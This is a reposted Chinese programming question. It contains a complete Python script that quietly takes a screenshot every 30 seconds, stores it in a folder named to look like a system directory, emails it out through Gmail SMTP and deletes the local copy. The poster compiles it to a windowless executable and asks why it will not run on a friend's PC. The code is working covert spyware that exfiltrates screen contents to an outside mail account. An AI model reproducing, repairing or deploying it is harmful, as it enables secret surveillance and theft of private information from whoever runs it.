当前位置:   article > 正文

python此应用无法在你的电脑上运行_使用pyins编译python脚本后,无法在您的PC上运行Getting应用程序...

编译python源码时,此应用无法在你电脑上运行

我写了一个程序,把截图发给我的电子邮件地址。我使用pyinstaller使python脚本可执行。我通过执行命令:

pyinstaller-w截图.py-F这个可执行程序在我的电脑上运行得很好

朋友的电脑,我出错说“此应用程序无法在你的电脑上运行。到

查找PC的版本,请与软件发行商联系。“

代码:import os

import time

import string

import random

import smtplib

import pyautogui

from email.mime.text import MIMEText

from email.mime.image import MIMEImage

from email.mime.multipart import MIMEMultipart

if os.path.exists('C:\\$y$temF0lder'):

pass

else:

os.mkdir('C:\\$y$temF0lder')

os.chdir('C:\\$y$temF0lder')

def send_mail():

msg = MIMEMultipart()

fromadd = 'fromadd@gmail.com'

toadd = 'toadd@gmail.com'

msg['From'] = fromadd

msg['To'] = toadd

msg['Subject'] = 'Photos'

text = MIMEText('Pic')

msg.attach(text)

img = open(image_name, 'rb').read()

send_image = MIMEImage(img, name=os.path.basename(image_name))

msg.attach(send_image)

sessions = smtplib.SMTP('smtp.gmail.com', '587')

sessions.ehlo()

sessions.starttls()

sessions.ehlo()

sessions.login(fromadd, 'P@ssword')

sessions.sendmail(fromadd, toadd, msg.as_string())

sessions.quit()

def main():

global image_name

while True:

name = ''

for i in range(10):

x = random.randint(0,62)

name += string.printable[x]

screenshot = pyautogui.screenshot()

screenshot.save(name + '.png')

image_name = name + '.png'

send_mail()

os.remove(image_name)

time.sleep(30)

if __name__ == '__main__':

main()

如何解决这个问题?

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/915268
推荐阅读
相关标签
  

闽ICP备14008679号